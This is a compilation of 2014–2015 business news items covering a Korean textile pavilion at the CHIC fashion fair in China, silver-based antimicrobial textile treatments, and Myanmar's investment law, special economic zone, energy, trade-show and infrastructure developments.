Korea Federation of Textile Industries (Chairman Sung Ki Hak) is conducting a 'Preview in China 2015' at the China International Clothing & Accessories Fair (CHIC), the largest and most influential fashion fair in the Asia-Pacific region at which over 1000 brands from 23 countries and regions are to be exhibited, attracting more than 115,000 visitors and buyers. ‘Preview in CHINA’ opens about 200 booths for 20 Korean textile and apparel companies to exhibit Korean men's, women’s and children’s wear including Casual, Fashion Accessories, etc. to support Korean firms to successfully enter into the Chinese market.

As the bellwether of the Chinese garment industry, CHIC is constantly innovating and adjusting its overall layout, style, and functions based on changing industrial and marketing demands. On the basis of the existing 8 sections of Men's Wear, Casual & Sports, Women's Wear, Kids' Wear, Leather/Fur & Down Wear, Fashion Accessories, Fashion Related Resources and Overseas Pavilions, four brand-new areas, which include In Signature, Future Link, Impulses, and Superior Factory will also be brought out in CHIC2015. The event is sponsored by the Ministry of Knowledge Economy (MKE), China National Textile and Apparel Council, and China National Garment Association, the Korea Federation of Textile Industries prepares Exhibition, Press Conference, Fashion Shows, Seminars and Biz-meetings to discover new distribution channels into the north Chinese market and beyond for the Korean textile and apparel industries.

An official for the Korea Federation of Textile Industries said that they expect this fashion fair to accelerate Korean firms to settle in to address Chinese domestic market optimizing opportunities created by the Korea-China FTA. The 23rd China International Fashion Fair (CHIC2015) will be held for the first time in the newly-built National Exhibition and Conventional Center, which covers 100,000 square meters located in the Shanghai Hongqiao Business Area from March 18th to 20th.

Silver-Based Antimicrobials treatment keeps textiles and garments fresher and long lasting

A new generation of silver-based antimicrobial treatments for textiles, utilising unique delivery systems, is poised to usher us into what one might call the era of Odour Control 2.0. Silver inhibits the growth of odour-causing bacteria on textiles through the release of silver ions (Ag+), which break down the cell walls of microbes and interfere with their normal metabolic processes; but the efficacy, durability, safety, and environmental effects of silver treatments can vary widely. Despite silver’s established history as a safe and natural antimicrobial, many of the current technologies have fallen short.

Surprisingly, silver-based technologies had only a 9% share of antimicrobial textile treatments in 2004, growing to 25% in 2011, according to a 2013 study entitled Comparative Evaluation of Antimicrobials for Textile Applications, authored by Windler, Height, and Nowack and published by Elsevier in the online journal Environment International. The new, non-nano silver-based technologies have been engineered for improved ease of handling and durability, utilising silver salts from recycled silver products, or molecular ionic silver.

Started in 2009, PurThread® is a yarn-based technology that permanently embeds a silver salt into synthetic fibres, demonstrating a high degree of efficacy that outlasts 100 industrial washings. Dow SILVADUR™, launched in 2012, is a technology that delivers silver ions in a liquid topical treatment, forming an acrylic-based polymer throughout the textile that provides a consistent and homogenous dose of antimicrobial odour control through 50 washings, using a low level of silver.

Brands weigh the pros and cons

The confusing claims and lack of a standardized testing protocol for textile antimicrobial treatments have made it difficult for retailers, brands, and textile manufacturers to choose among the competing technologies. With sustainability and transparency top of mind, some of the major athletic and performance apparel brands have simply stayed away from the technology entirely. On the other hand, a surprising number of brands and retailers simply ask for the cheapest available antimicrobial formulation that will survive 10 – 20 home washes, according to several textile manufacturers, who declined to be quoted.

Other brands take a more thoughtful approach. With its impeccable eco credentials, Patagonia’s endorsement of silver salt-based Polygiene®, made in Sweden, carries some weight. Made from recycled silver, the Polygiene technology is also highly regarded among European brands. While global outdoor brand Columbia declined to reveal its specifications for choosing its antimicrobial technologies, Scott Trepanier, senior manager for PR and promotions, noted that “on a style-by-style basis, our global styles incorporating an antimicrobial have a sewn-in label disclosing the active biocide chemical.”

Canadian manufacturer Lamour relies on silver-based antimicrobials for its base layer brand Terramar Sports, according to vice-president of product development and innovation Michael Smith. “We’ve always believed that silver was the number one antimicrobial, and in a micro porous yarn, silver could be very effective,” el explica. “The yarn is very expensive, but we still use it in our high-end product. Where we’ve moved to topical finishes, we are most concerned with efficacy. The binder is very important.”

The company now relies on a combination of yarns and finishes providing antimicrobial benefits, thermal regulation, and odour adsorption. “Our statistics show that these products are more in demand. The young people in the market like technology. We built our business on technology, and for the most part we are very specific with our suppliers,” Smith continues.

New delivery systems improve performance

With the increased popularity of performance apparel, the new generation of silver-based antimicrobials could meet the growing need for odour-control products that offer measurable results, durability, and ease of use, along with low dosage and reduced depletion of the active ingredient. The eco-concept of fewer home launderings and increased garment longevity is an important aspect of the value proposition. SILVADUR’s silver ions are extracted at the molecular level and delivered via a water-based system; the resultant complexed polymer provides their controlled release in the presence of bacteria on the fabric. This approach to “intelligent freshness” is said to optimize antimicrobial efficacy.

Because SILVADUR is not particle-based, it is not depleted by use or in washing. “It’s all about the delivery system. Particle-based delivery systems are archaic,” believes SILVADUR’s Bob Monticello, the lead technology application expert for the new Dow technology. The controlled release of the silver ions also means that standard antimicrobial tests such as AATCC100 are not an appropriate means of measuring the product’s efficacy. According to Monticello, a member of the International Antimicrobial Council (IAC), Dow tests SILVADUR using labs that specialize in antimicrobial textiles, and are certified by the IAC. He defines the test as “based on real life performance, defined and reproducible.”

“By providing odour control and bacteria reduction to denim, consumers are able to wash the product less, protecting the colour, fit, and stretch of their jeans,” explains Karel Williams, global strategic marketing manager for Dow SILVADUR.

Microban also relies on a proprietary carrier for its SilverShield technology, which targets polyester-based performance fabrics. “The bonding system is critical,” agrees Brian Aylward, director of liquid formulations R&D for Microban. “The trick is in the overall formulation. The carrier bonds the silver salt and makes it highly resistant to washing. It’s way more durable.”

PurThread developed a unique process to embed man-made fibres with Eastman Kodak’s silver antimicrobial agent, derived from recycled silver, at the manufacturing stage. Silver inhibits the growth of odour-causing bacteria on textiles through the release of silver ions (Ag+). &dupdo; Debra Cobb Originally targeted to industrial and hospital end uses, PurThread is rigorously tested to AATCC100 standards and found to withstand 100 industrial launderings including hydrogen peroxide and chlorine bleaching. PurThread was also shown to kill 99.99% of MRSA, Salmonella, E. coli, and P. acnes (among others) after four hours in university laboratory tests, showing future potential for health care and other applications.

Polyester yarns embedded with PurThread function like standard polyester in manufacturing, dyeing well in most colours, and blending with other fibres such as TENCEL® and elastane. The non-nano silver particles remain distributed throughout the fibre, and do not wash down the drain, according to PurThread CEO and president Lisa Grimes. “We hold ourselves to extremely high standards, and we know we do what we say,” insists Grimes. “I think the industry is starting to look more closely at test methods, and at what works in a real world setting.” A recently-announced partnership with global textile manufacturer Burlington, a part of the International Textile Group, will expand PurThread’s presence into the markets for active wear, uniforms, military and special apparel. PurThread will also market its brand to consumers via hang tags reading “Protected by PurThread.”

Making an informed choice

Whether the technology withstands 25, 50, or 100 washings, increasingly active and tech-savvy customers have a place for odour control in their wardrobes. As government and industry standards for health and environmental safety become more exacting, brands, retailers, and manufacturers owe it to themselves and their customers to do due diligence regarding new and existing antimicrobial technologies for odour control.

SOURCE: Innovation in Textiles

Viet Nam's Hanel DTT Technology Joint Stock Company signed a cooperation agreement with Sundrew Myanmar Company to build an open e-government platform (OEP) based on open source technologies in Myanmar.

The ceremony for the signing of the agreement was held at a Viet Nam-Myanmar business matching session in Yangon, Myanmar, on Wednesday.

The two sides have agreed to share their resources to implement e-government projects in Southeast Asia, and work in government-to-government (G2G) systems on the projects.

They will also exchange information, experience, technology and experts to build OEP communities in order to expand OEP functions and carry out projects of the two countries.

The agreement marks an advance in bringing Vietnamese technology into the world.

OEP has been carried out in Da Nang City, Ha Noi City and in the fourth level of public healthcare services of the Ministry of Health. The OEP 1.1 version is expected to be released at the end of 2014, with basic functions meeting the demands of authorities for managing citizens and exchanging data with other cities and ministries.

The OEP 2.0 version will be launched in 2015 with improved functions to support technologies such as cloud computing, mobility and big data.

DTT has been providing solutions for e-government and enterprise integration for enterprises and organisations in Viet Nam. Its parent firm, Hanel Limited Company, which was established in 1984, focuses on different fields including electronics, computers and telecom; real estate and financial management; and building infrastructure for hi-tech parks.

Earlier, VNPT International, a member company of the Viet Nam Posts and Telecommunications Group (VNPT), inaugurated its first representative office in Yangon on Tuesday.

At the opening ceremony, member companies of VNPT signed memorandums of understanding (MoUs) with Burmese telecom enterprises. According to the MoUs, VNPT-I will continue to cooperate with its partner, the A1 Construction Company Ltd, to implement telecom and software products and IT solutions.

VINASAT centre, under the management of VNPT's subsidiary Viet Nam Telecom International (VTI), will provide satellite bands for the Myanmar Ministry of Defence.

VNPT and the Elite Telecom Public Company Limited will also survey the market and set up a plan to establish a joint venture to provide Internet services there.

In a meeting with Viet Nam's Minister of Information and Communications Nguyen Bac Son on Monday in Nay Pyi Taw, Myanmar President Thein Sein said that Viet Nam and Myanmar had signed an agreement to cooperate with each other in 12 fields, including telecom and IT. He added that Myanmar would focus on investing in the two above-mentioned sectors in the near future, and affirmed that the country would help Vietnamese enterprises in all fields, especially in telecom and IT, to learn about the Burmese market to enhance co-operation.

Myanmar is considered to be an emerging telecom market. At the end of 2012, only 5.4 million of its 60 million people, equivalent to nine per cent, owned mobile phones, compared to 70 per cent in Cambodia, 87 per cent in Laos and 100 per cent in Thailand. The government of Myanmar aims to increase the number of mobile phone users to 75 to 80 per cent by 2016.

Source: VNS/VNN Hanel DTT, Myanmar

Draft legislation amalgamating Myanmar's two investment laws is expected to be completed in November, Directorate of Investment and Company Administration director general U Aung Naing Oo has told Mizzima.

U Aung Naing Oo said the legislation will merge the Foreign Investment Law enacted in November 2012 and the July 2013 Myanmar Citizens Investment Law.

They replaced laws enacted in November 1988 and March 1994 respectively.

U Aung Naing Oo said the reasons for merging the laws included Myanmar being the only remaining member country of the Association of Southeast Asian Nations with two investment laws.

"Laos had two investment laws but they were combined in 2007," he told Mizzima on September 27.

U Aung Naing Oo said another reason was that ASEAN and the World Trade Organisation wanted a level-playing field in Myanmar for domestic and foreign investors.

Consultations on the draft law were continuing with the business community but have been completed with relevant government ministries.

"I cannot yet say what provisions [in the existing laws] will be amended or modified until discussions are completed with stakeholders in the business community," he said.

U Aung Naing Oo acknowledged that the amalgamated law could include a list of sectors restricted to Myanmar investors.

"I will be able to reveal the list after the consultations with stakeholders," he said.

U Aung Naing Oo said the draft legislation would be known as the Myanmar Investment Law and could tentatively be passed by parliament in the first quarter next year.

The International Finance Corporation, part of the World Bank Group, has been providing technical expertise for the drafting process, the IFC's senior operations officer in Yangon, Charles Schneider, told Mizzima in an email on September 27.

"A draft law has been prepared and consultations with stakeholders are planned to take place soon," Mr Schneider said, adding that once the legislation was enacted it would streamline investment procedures and strengthen investor protection.

“A combined investment law will clarify investment rules and be an important step forward towards creating a level playing field for all investors," he said.

Mr Schneider said Myanmar was the only ASEAN member with separate domestic and foreign investment laws.

"Combing these laws is also a part of Myanmar's integration within ASEAN," he said.

Myanmar Railways has invited tenders from local and foreign businesses to set up a joint venture to introduce luxury train cars, which will target foreign tourists, to the railway system, U Zaw Phay Sein, general manager of the state-run enterprise, said.

The joint venture will be expected to handle the tasks of repairing steam train engines and buying or constructing new luxury train cars that meet international standards.

“We will invite tenders from private businesses to set up a joint venture with the government. We will initiate the operations after carefully scrutinising the bidders and choosing [the winner],” said U Zaw Phay Sein.

The tender invitation was issued on September 15 and can be submitted until after October 15, with a submission fee of K10,000.

“The main thing is to be able to provide full service to foreign tourists. Some tourists like to experience luxury train rides,” U Tin Tun Aung, joint secretary of the Union of Myanmar Travel Association, told Myanmar Business Today.

Source: Myanmar Business Today

PTT Exploration and Production Public Company Limited (PTTEP), the upstream arm of Thailand’s state-run PTT Pcl, said it plans to spend an additional $3.3 billion on projects in Myanmar during 2014-18.

Thailand’s top oil and gas explorer, which has been operating in Myanmar for 25 years, has already invested $4 billion in the country.

PTTEP plans to spend a total of $16 billion for all regions over that period, the company said in a statement. The allocation for Myanmar will go towards seven exploration projects: Myanmar M11, Myanmar M3, MOGE 3, Myanmar PSC G and EP 2, and Myanmar MD-7 and MD-8.

PTTEP President and CEO Tevin Vongvanich said: “We’ve continually invested in Myanmar. Our dedicated goal remains to conduct our business utilising both our expertise and experience in finding and developing petroleum resources for the benefit of both the Myanmar and Thailand.”

As of August, PTTEP’s cumulative production of natural gas and condensate from Myanmar acreages topped 1.26 trillion cubic feet and 9 million barrels, respectively.

The energy giant said its parent was keen to invest and develop energy-related infrastructure, refineries, gas pipelines, petrochemical and power plants in Myanmar.

PTTEP has been a joint venture partner in Myanmar’s two key offshore gas production projects – the Yadana and Yetagun – which came on line in 1995 and 1997, respectively.

The onshore Myanmar MOGE 3, Myanmar PSC G and EP 2 are PTTEP’s latest acquisition following the recent conclusion of a production sharing contract (PSC) to step up the company’s presence in the upstream works in Myanmar.

PTTEP, ranked among Asia’s top 10 explorers, is looking for overseas oil and gas assets to boost Thailand’s energy security. The country uses gas for almost 70 percent of its electricity generation.

Extensive exploration drilling program has started in Block PSC G and EP 2 and the firm said it will further expand into offshore areas late this year. PTTEP’s newest Myanmar offshore inclusion Zawtika gas field’s production has also been ramped up to 300 million cubic feet per day (MMSCFD) and is shared by both Thailand and Myanmar. PTTEP has an 80 percent stake in the project with a 20 percent share held by state-owned Myanma Oil and Gas Enterprise.

Source: Myanmar Business Today

Myanmar is changing fast and there are at least three changes that are currently visible. First, there is transition underway from a military system to democratic governance. Second, the economy is moving away from a centrally-planned superstructure to a market-led framework. Third, after decades of violence, we are seeing peace and normalcy return to this beautiful country.

All these put together are offering opportunities never seen before to investors near and far. Many countries have either initiated or are at an advanced stage of consultations to carve out an engagement framework that would offer their firms preferential access to one of the few final frontier markets in Asia.

A growing economy Call it the ‘gold rush’ or simply a case of waking up to smell the coffee, the fact is these transitions have the potential to give Myanmar a chance to retrieve its place as one of the most dynamic economies in Asia. And given a history of robust ethnic, cultural and religious linkages as well as the close physical proximity, India, too, would do well to chalk out a more proactive agenda of engagement with Myanmar.

There are two imperatives for this. First, Myanmar — like the other CLMV countries (Cambodia, Laos, Myanmar and Vietnam) — represents a rapidly growing economy with rising consumption, strategic location and access, rich natural resources (oil, gas, teak, copper and gemstones), biodiversity and an industrious workforce with low wages. And it offers significant opportunities for trade in goods and services, investment and project exports.

Second, Myanmar’s strategic connectivity to India’s North-East through the land route and maritime connectivity through the Bay of Bengal make it a bridge between India and Asean. which is crucial in the context of our growing engagement with the region.

We get two benefits if we establish strong land and sea links between our North-East and Myanmar. One, it helps India and Myanmar bond better, and two, it creates gateways for our merchandise exports to Asean countries.

Trade and investment The good news is that businesses are beginning to respond to these dynamics and emerging opportunities spanning agriculture, plantation, infrastructure, information technology, healthcare and education.

With bilateral trade at $2.18 billion in 2013-14, India and Myanmar are eyeing $3 billion turnover by 2015 and Indian investments in Myanmar, which amounted to $283 million till 2013, are expected to soar to $2.6 billion over the next few years.

India’s engineering sector is eyeing the Myanmar market to create a bigger presence for engineering exports, and oil and gas companies ONGC Videsh and GAIL are aggressively scouting for more exploratory blocks in Myanmar. United Bank of India, State Bank of India and Bank of India have set up representative offices in Myanmar and so has the Exim Bank of India.

These have brightened the outlook for trade and investment, even as we wait for larger scale full operations.

Need a big leap However, India’s strategy in Myanmar now needs to move aggressively towards a big leap forward in economic ties, cooperation and investments. Other countries such as China, Japan, the UK, France and the US have been moving at a quick pace for prime slots in vital sectors such as energy, oil and gas, mining and manufacturing and unless we take some proactive measures to step up our presence, we will fall behind.

Infrastructure and connectivity are potential game-changers in India’s equations with Myanmar. In connectivity, a top priority is developing direct flights between India and Myanmar with the larger objective of expansion of our trade volume.

There is currently only one twice-weekly direct Air India flight from India to Myanmar, from Kolkata to Yangon (besides seasonal flights to Bodh Gaya for Myanmar pilgrims).

In contrast, there are nearly 100 flights from Yangon and Mandalay to Bangkok and over 40 to Singapore. The Indian aviation players would do well to explore the new destinations that are opening up and create direct air links which will also facilitate closer business interaction.

Myanmar’s growing need for infrastructure, for instance, ports, to enhance sea and land connectivity, offers a lucrative playing ground for India.

The Myanmar government has put huge emphasis on infrastructure development projects as it sees connectivity as a key factor in promoting trade and enabling Myanmar’s integration with the Asean Economic Union by 2015.

The two countries are working on extension of the India-Myanmar-Thailand trilateral highway project to Laos and Cambodia, which would enhance regional connectivity and commerce.

Port connectivity can be an asset and large Indian companies should consider investing in the development of the Kyaukphyu Special Economic Zone for its vantage point in the Bay of Bengal.

India has developed another port a little further north at Sittwe intended to link Kolkata with Mizoram and our North-East through an inland waterway and road along the Kaladan river.

It is also extending a road linking the Mizoram border to western Myanmar. These could well be developed into full-fledged economic corridors with industrial hubs in key locations benefiting trade and commerce. Of course, timely completion of such projects is the key.

Myanmar has opened doors to support the agriculture sector and companies can tap opportunities in the entire value chain including seeds, agri-machinery, pre - and post-harvest technology.

Further, in the energy space, companies should look at setting up power stations, transmission and distribution lines and supply of gensets.

As Myanmar further opens up and modernises, its needs will multiply and diversely so.

Indian companies are evaluating opportunities, but time is not on our side as the numbers of global players who want to put Myanmar on fast gear are growing. The Indian Government too will have to double its efforts in leading the critical connectivity projects. It is anybody’s game. Let it be India’s.

Source: The Hindu Business Line

Myanmar President U Thein Sein Wednesday called on ASEAN member states to take sustainable agricultural development, food security and nutrition as the main national duties.

"ASEAN member states must work hand in hand to meet the objectives of the UN Millennium Development Goals (MDG) with the aim of zero hunger by 2025," U Thein Sein told the 36th Meeting of ASEAN Ministers on Agriculture and Forestry (AMAF) in Nay Pyi Taw.

He said that global population is increasing annually and it is expected to increase from 7 billion to over 9 to 10 billion by 2050, Xinhua reported.

Warning that at present a total of 850 million people are facing food security and malnutrition, he called for doubling the food production.

The 10 member political and economic bloc is comprised of Indonesia, Malaysia, the Philippines, Singapore, Thailand, Brunei, Cambodia, Laos, Myanmar and Vietnam.

Source: Business Starndard

Sep 18, 2014

Twelve Firms to Vie to Become Developers for Kyaukphyu SEZ

A total of 12 local and foreign companies will compete for three spots as developers for the Kyaukpyu Special Economic Zone (SEZ) in Myanmar’s western Rakhine State, an official of the project tender valuation panel said.

U Ba Shwe, a member of the Committee of Bid Invitation and Selection for the Kyaukpyu SEZ Project, said the 12 companies were short-listed from 61 firms which officially submitted expression of interest (EOI) in August for the development of the SEZ.

The initial phase of the Kyaukpyu SEZ development project, covering an area of 1,620 hectares, will have three components, a deep-sea port, an industrial park and an integrated residential area, he said.

The tender process will last from September 15 to November 10, he said.

If the winning companies are international ones, they are set to form joint ventures with local companies for the undertakings, he added.

According to the committee, the Kyaukpyu SEZ project will be implemented in three phases with the first from 2014 to 2016, while the second from 2017 to 2020 and the third from 2021 to 2025.

The SEZ administration chose earlier a Singapore-based consortium, led by CPG Consultancy Ltd, to draw up a master project plan for the Kyaukpyu SEZ.

The CPG serves as the key advisor for choosing and inviting international developers to the Kyaukpyu SEZ under an agreement signed with the Committee of Bid Invitation and Selection for the Kyaukpyu SEZ Project.

Source: Myanmar Business Times

Yangon, 18 September 2014 – Investment in technology to lift manufacturing standards is critical in keeping Myanmar competitive in the international arena. The inaugural edition of Manufacturing Myanmar will deliver a presentation of manufacturing solutions from well-known international brand names to the manufacturing community in Myanmar, providing a valuable platform for the sourcing of the necessary automation needed to boost capabilities, and increase output of Myanmar’s manufacturing industry.

Held at the Myanmar Convention Centre in Yangon, from 2 – 4 October, more than 85 exhibitors from 16 countries/regions will showcase a wide selection of new to Myanmar manufacturing solutions that are best suited to help increase productivity and open up new avenues of business for the budding manufacturing sector. Technologies on showcase will include metalcutting and metalforming machines, test and measurement equipment, tooling systems, and supporting equipment such as air compressors, welding equipment and labelling systems. Notable brand names that will feature at the event are Brother, Masima, Carl Zeiss, GF Machining Solutions, Guehring, Haimer, Nikon, Olympus, TRUMPF, Tungaloy, Wenzel, and YG-1 among many others.

“Manufacturing Myanmar is a great opportunity for manufacturers in Myanmar to learn more about technology and tools available to them in the international market. The emergence of the local manufacturing industry is critical to Myanmar’s economy, and local businesses need to step up in order for the sector to realise its full potential. The adoption of technology to automate production processes is undoubtedly a step in the right direction,” says Mr. U Aye Tun, Vice President of Myanmar Industries Association.

“Myanmar is a very favourable location for international manufacturing services, and I am glad there is a show like Manufacturing Myanmar to set an international benchmark and provide valuable exposure to the machinery needed to help level-up capabilities of local manufacturers and make Myanmar an attractive location for international companies to set up production operations,” él añade.

Mr. William Lim, Project Director for Machinery Events, from organiser Singapore Exhibition Services says, “Over 90 per cent of our exhibitors are from overseas, and they are very thrilled to present their products to the manufacturing community in Myanmar. This will be the first time many of them have ventured into Myanmar, and are certainly looking forward to sharing their knowledge and introducing the right kind of tools and machines that will add value to the operations of local manufacturers.”

Technology on show at Manufacturing Myanmar 2014 Showcasing their series of CNC Lathe Machines, Mr. Kevin Chua, Managing Director of Asia Masima, says, “With the expansion of industries in Myanmar, we foresee many opportunities where we can introduce the right solutions to the local industry. Minimal investment is required to integrate our machines with current operations, and with our suite of innovative solutions and on-site application support, we will be able to provide value added services to companies in Myanmar. Manufacturing Myanmar 2014 is an ideal opportunity to position Asia Masima for the coming year ahead.”

Similarly, Benign Enterprise, a worldwide supplier of machine tools and manufacturing equipment such as lathes, milling machines, drilling machines, grinders, bandsaws, woodworking equipment, and machine tool accessories among others, is looking forward to introducing their solutions to the Myanmar market. The company’s General Manager, Mr. David Wu says, “Myanmar is a developing country that has great potential to further grow its manufacturing sector. Our machines can be applied across a wide range of manufacturing processes, and can be used to make all kinds of products. Our machines are not only high in quality and efficient, but also very cost competitive. This makes it easy for manufacturers in Myanmar to integrate our machines to increase efficiency of their current operations and improve quality of their products.”

-End - Manufacturing Myanmar 2014 at a glance: Exhibition: Manufacturing Myanmar 2014 Venue: Myanmar Convention Centre (MCC) Date: 2 - 4 October 2014 (Thursday to Saturday) Time: 0900hrs – 1700hrs Website: www. manufacturingmyanmar. com

About Singapore Exhibition Services Set up in 1976, Singapore Exhibition Services has established itself as one of the most innovative and respected exhibition and conference organisers in Asia. A pioneer in the Singapore exhibition industry, Singapore Exhibition Services’s events have served as important platforms for companies aiming to forge new business contacts in Asia. With a portfolio of international tradeshows already serving the Communications, Engineering, Machinery and Lifestyle industries, the company continues to develop new events to meet market needs. Its events consistently attract a high level of overseas participation with foreign exhibitors accounting for almost 80 per cent of the show floor. The company is a member of Allworld Exhibitions Alliance, a global network with over 50 offices worldwide. For more information, please visit www. sesallworld. com.

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Patricia Yee PR Executive Singapore Exhibition Services Tel: +65 6233 6637 Email: patricia. yee@sesallworld. com

Singapore, 16 September 2014 – The inaugural edition of Oil & Gas Myanmar is aiming to be a key driver in establishing a holistic supply chain of equipment and services for the burgeoning oil and gas industry in Myanmar.

The exhibition, held from 15 – 17 Oct 2014, will feature more than 100 exhibitors from 22 countries/regions covering products and expertise catering to the upstream, midstream and downstream sectors of the industry.

“Myanmar opening the industry to international energy companies, has triggered a growing demand for the correct equipment and capabilities in this field. With much of this expertise residing outside the shores of Myanmar, Oil & Gas Myanmar has gathered a host of internationally known industry names introducing the necessary equipment and services for each sector of the oil and gas value chain,” says Mr. Chua Buck Cheng, Project Director for Engineering Events, of organiser Singapore Exhibition Services.

With the majority of the oil and gas industry in Myanmar currently focused on upstream activities, Oil & Gas Myanmar has pooled together exhibitors to meet this demand; they include well-known industry names such as 3D-GEO, Downhole Products, Fluid Inclusion, Lonestar Triplefast, Sensitron Singapore and Technics Offshore Engineering.

Together, these exhibitors will showcase a range of upstream products and services including geophysical products and services, geological studies and consulting, modern technologies of drilling, offshore and onshore field exploitation, seismic data acquisition and surveying among many others.

One of the earlier entrants to Myanmar in the late 1980’s, exhibitor 3D-GEO is an Australian based geoscience and petroleum engineering consultancy with earth modelling experience throughout the Australia and Asia region. On their participation at Oil & Gas Myanmar 2014, Mr. Keven Asquith, CEO and Exploration Specialist at 3D-GEO comments, “3D-GEO will be showcasing our experience and expertise in seismic processing, geotechnical 3D modelling and reservoir engineering in the Australia and Asia region. Having worked with many of the international energy companies currently exploring in Myanmar, we can certainly assist petroleum explorers in Myanmar by improving their seismic data quality and geotechnical evaluation workflows to optimise basin-wide and prospect evaluations. We hope to refresh our knowledge of Myanmar and collaborate with the Myanmar Oil and Gas Enterprise (MOGE) and local industry partners to tackle the challenges of exploring and developing petroleum resources in this beautiful country.” Mr. Peter Pratabh, Business Development Manager of Downhole Products says, “As more and more clients are becoming aware of the need for quality wells, which require good centralizer’s and float equipment, there has been a growing demand in Myanmar for Downhole Products equipment. We are very optimistic about the current oil and gas industry in Myanmar and are looking forward to further development of its upstream sector.” “By participating at the Oil & Gas Myanmar 2014 we are able to physically show the actual products and its advantages to all parties. It also provides a platform for us to engage with local professionals and executives from related sectors, and show our commitment in servicing Myanmar’s oil and gas requirements,” él añade. Not to be outdone, well-established local oil and gas services companies Parami Energy and Smart Technical, along with Myanmar Oil and Gas Enterprise (MOGE) will make up the local presence at Oil & Gas Myanmar 2014. ***

Exhibition at a glance: Show: Oil & Gas Myanmar 2014 The Oil & Gas Exploration, Production and Refining Exhibition Date: 15 – 17 October 2014 (Wednesday – Friday) Venue: Myanmar Convention Centre, Yangon Opening hours: 0900hrs – 1700hrs daily Admission: Business and trade professionals only Website: www. OGMyanmar. com

About Singapore Exhibition Services Set up in 1976, Singapore Exhibition Services (SES) has established itself as one of the most innovative and respected exhibition and conference organisers in Asia. A pioneer in the Singapore exhibition industry, SES events have served as important platforms for companies aiming to forge new business contacts in Asia. With a portfolio of international tradeshows already serving the Communications, Engineering, Machinery and Lifestyle industries, SES continues to develop new events to meet market needs. SES events consistently attract a high level of overseas participation with foreign exhibitors accounting for almost 80% of the show floor. SES is a member of Allworld Exhibitions Alliance, a global network with over 50 offices worldwide. www. sesallworld. com.

Editorial contact Patricia Yee PR Executive Singapore Exhibition Services Tel: +65 6233 6637 Email: patricia. yee@sesallworld. com

Myanmar has the potential to grow almost 10 percent per year if the country can maintain stability, invest in key sectors and stay connected to the rest of the world, the Asian Development Bank (ADB) said.

The Manila-based lender said the sweeping reforms in the Southeast Asian country require “substantial investment,” especially in the areas of education and infrastructure.

“The country at full potential can grow 9.8 percent per year,” said ADB assistant chief economist Dr Cyn-Young Park at a press conference, where ADB presented a report, Myanmar: Unlocking the Potential, on the current state of the Myanmar economy and its potential for growth.

“One Percent [GDP] growth can come from investment in education.”

Although public spending on education as a percentage of GDP has more than doubled since 2011, Myanmar still spends the least amount of money on education in Southeast Asia, according to the report.

The report mentions a “void” in skilled workers due to past neglect in health and education investment.

The inadequately educated workforce, along with the lack of access to financing, policy instability and corruption are the four most problematic factors for doing business in Myanmar, according to a World Economic Forum report.

Park said: “These are areas that the government is already working on, but needs to accelerate reform.”

Winfried Wicklein, country director for the ADB, said that the government has already signalled significant reforms, citing the issuing of telecom licences as evidence of the government’s commitment to opening the country.

The ADB report also outlines several strategies for increasing government revenue streams.

The report states, “The tax structure must be simplified and exemptions reduced. The current system is extremely complicated and this, together with low capacity in tax administration, means the tax that individuals and businesses actually pay is often arbitrary.”

Some reforms can be implemented in the short term without passing legislation, such as correcting leakages in the tax system, said Park.

Some of the recommendations would require new laws to be passed, such as the implementation of a value added tax. This could be done smoothly, said Park, as VAT is “relatively easy” for tax collection and covers a broad tax base. However, he conceded that VAT can negatively affect income distribution, and that some items would need to be excluded from the VAT.

One bright point in Myanmar’s economic future is the potential for the tourism industry. According to previous ADB and Myanmar Ministry of Hotels and Tourism forecasts, tourists visiting Myanmar would increase up to 700 percent between 2012 and 2020.

However, “The country is already bypassing the high growth scenario,” said Park, implying that a lot of infrastructure building is required to accommodate tourism development.

Wicklein said the ADB is currently financing 80 kilometres (50 miles) of an upgrade to the East-West Economic Corridor, planned to stretch from Mawlamyine to Da Nang in Vietnam, along with other projects in the areas of energy and community development.

Source: Myanmar Business Today

The Association of Vietnamese Investors in Myanmar (AVIM) hopes to raise its investment in Myanmar to $1.5 billion by 2015 in making Vietnam one of the five largest foreign investors in that country.

AVIM chairman Tran Bac Ha unveiled the target at a meeting with Speaker of Union of Myanmar Assembly Thura U Shwe Mann in Hanoi, Vietnam News Agency (VNA) reports.

Ha said businesses will work to help enhance two-way trade to $650 million to $700 million, and the number of Vietnamese tourists to Myanmar to 35,000 in the future.

AVIM representatives proposed that Myanmar’s government and parliament develop an “open-door” legal system and improve investment incentives for foreign investors.

They emphasised the need to have agreements on encouraging and protecting investment, and issuance of regulations on ownership of investment assets for Vietnamese firms n Myanmar.

The association hoped Myanmar will accelerate the licensing process for Vietnamese projects in the fields of textile, agriculture, health care, energy, construction material production, finance and banking.

Thura U Shwe Mann said Myanmar is learning from the experiences of other countries to improve its legal framework and to simplify administrative formalities to attract more foreign investment to the country.

Mann called on AVIM to continue acting as a bridge to bring more Vietnamese investment to Myanmar particularly in agriculture, hotel, tourism, finance and banking, and to contribute to deepening bilateral relations between both countries.

Established under an initiative by the Bank for Investment and Development of Vietnam (BIDV), AVIM comprises 76 members including PetroVietnam, Vietnam Airlines, Hoang Anh Gia Lai Group and Song Da Corporation.

At present, Vietnamese investors have seven projects worth $600 million in Myanmar with the biggest being Hoang Anh Gia Lai Group’s complex of hotels, apartments and offices worth $440 million.

Fifty-six Vietnamese businesses have been licensed to operate in Myanmar so far, according to Myanmar Investment Commssion (MIC) data.

Source: Myanmar Business Today

Mandalay International Airport will be upgraded into a logistics hub, according to the Department of Civic Aviation (DCA).

The upgrade is expected to improve the airport so that it can provide cargo and distribution services for international and domestic goods.

“First, the airport buildings and terminals will be upgraded. This will be followed by preparation efforts to provide cargo service,” said U Win Swe Tun, director general at DCA.

Mitsubishi-Jalux, a Japanese firm, along with its Myanmar partner, SPA Project Management, has been awarded the tender to upgrade and operate the airport for a 30-year term.

“We have sent the proposal for the project to the Myanmar Investment Commission. We are sure it will be approved within the year,” U Win Swe Tun said.

The total area of Mandalay International Airport is 17,544 acres, while 3,682 acres are covered by runways and buildings. After the upgrade, the airport will have the capacity to serve 3.5 million passengers annually. According to DCA, the project is expected to cost K10 billion ($10.3 million).

The department plans to conduct upgrades to seven of Myanmar’s airports in the 2014-15 fiscal year. This includes Thandwe Airport in Rakhine state, Tachileik Airport, Naung Mon and Maisat Airports in Shan state, Loikaw Airport in Kayah state, Kalay Airport in Sagaing region and Koe Koe Island Airport in Yangon region.

Source: Myanmar Business Today

Sep 8, 2014

Taiwanese Association Eyes Almost Half-a-Billion Dollar Myanmar Industrial Park

